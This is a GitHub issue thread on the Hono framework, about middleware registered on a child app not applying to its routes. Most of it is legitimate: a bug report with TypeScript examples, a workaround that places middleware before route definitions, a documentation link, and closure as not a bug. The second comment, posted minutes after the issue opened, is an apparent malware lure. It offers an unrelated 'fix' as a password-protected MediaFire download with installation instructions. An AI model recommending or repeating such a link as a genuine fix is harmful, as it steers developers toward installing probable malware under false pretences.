### ISSUE TITLE
why you can only add Middlewares to the root hono app

### ISSUE THREAD

**Issue by lord007tn** [honojs/hono#3358] opened 2024-09-02 00:27 UTC
### What version of Hono are you using?

4.5.10

### What runtime/platform is your app running on?

Nodejs

### What steps can reproduce the bug?

// authors.ts
```
import { Hono } from 'hono'
import { authMiddleware } from '@/middlewares/auth';

const app = new Hono()
  .get('/', (c) => c.json('list authors'))
  .post('/', (c) => c.json('create an author', 201))
  .get('/:id', (c) => c.json(`get ${c.req.param('id')}`))

// block unauthenticated requests to all routes inside this file: not working
app.use('/*', authMiddleware )

export default app
```

// books.ts
```
import { Hono } from 'hono'

const app = new Hono()
  .get('/', (c) => c.json('list books'))
  .post('/', (c) => c.json('create a book', 201))
  .get('/:id', (c) => c.json(`get ${c.req.param('id')}`))

export default app
```

// index.ts
```
import { Hono } from 'hono'
import authors from './authors'
import books from './books'
import { authMiddleware } from '@/middlewares/auth';

const app = new Hono()

// block unauthenticated requests to all author routes: working
app.use('/authors/*', authMiddleware )

const routes = app.route('/authors', authors).route('/books', books)

export default app
export type AppType = typeof routes
```

so if you attempt to add authMiddleware to the child hono app it wont work 

### What is the expected behavior?

i think for better developer experience we should have the ability to add middlewares and encapsulate them inside children hono apps

### What do you see instead?

middlewares only works if you add it to the root app and have it point to the absolute path

**Comment by goncastrum** [comment] 2024-09-02 00:29
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by MathurAditya724** [comment] 2024-09-02 03:53
You can also wrote it like this to achieve what you want
```ts
// author.ts
import { Hono } from 'hono'
import { authMiddleware } from '@/middlewares/auth';

const app = new Hono().use(authMiddleware)

app.get('/', (c) => c.json('list authors'))

app.post('/', (c) => c.json('create an author', 201))
  .get('/:id', (c) => c.json(`get ${c.req.param('id')}`))

export default app
```

Instead of doing `app.use('/*', authMiddleware)`, you can do `app.use(authMiddleware)` and place all the middleware before defining the routes

**Comment by MathurAditya724** [comment] 2024-09-03 15:42
Is this what you are looking for? - https://hono.dev/docs/guides/middleware#definition-of-middleware

**Comment by lord007tn** [comment] 2024-09-03 16:19
@MathurAditya724 i read the whole docs no mention that middleware should be used before the route 
and for this it should be said somewhere

**Comment by TinsFox** [comment] 2024-09-24 07:33
I also encountered this problem when using it, and spent half a day debugging it. 🫨

**Comment by yusukebe** [comment] 2024-12-23 05:19
I'll close this issue since it is not a bug. Thanks.

**Closed by yusukebe** 2024-12-23 05:19 UTC
Labels: triage
